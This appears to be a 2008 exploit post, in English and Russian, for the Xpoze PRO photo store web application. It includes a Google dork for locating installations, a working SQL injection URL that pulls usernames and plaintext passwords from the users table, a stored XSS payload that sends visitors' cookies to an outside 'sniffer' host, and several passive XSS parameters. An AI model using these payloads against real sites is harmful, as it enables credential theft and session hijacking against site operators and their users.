Xpoz SQL-INJECTION, XSS.

Xpoz SQL-INJECTION, XSS.

Application: Xpoz PRO (Expoze Photo Store)

Website: http://xpoze.org

Version: All(current 1.0)

About:

Xpoze is a photo store very easy to use, yet having lots of features to help buyers and sellers to find or sell images after their needs.

Googledork: Powered by Powered by Xpoze.org

Date: 01-07-2008

Description:

Множественные уязвимости типа SQL-injection, активные и пассивные XSS.

[ SQL-INJECTION ]

http://host/home.html?menu=1[SQL]
http://host/user.html?uid=1[SQL]
http://host/account/admin/edite.html?eid=1[SQL]

and other…

===>>> Exploit:

http://host/user.html?uid=-1%20union%20select%201,user,1,1,1,pass,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20users%20limit%203,1/*

(!) Пароль в БД в открытом виде (!)

[ ACTIVE XSS ]

В форуме отсутствует фильтрация полей темы и сообщения.

===>>> Exploit:

<script>img = new Image(); img.src = "http://sniffer/sniff.jpg?&quot;+document.cookie;&lt;/script&gt;

[ PASSIVE XSS :) ]

http://host/?tpl=[XSS]
http://host/home.html?title=on&amp;description=on&amp;photo=on&amp;keywords=[XSS]

and

PHPInfo - http://host/phpinfo.php

…by Corwin…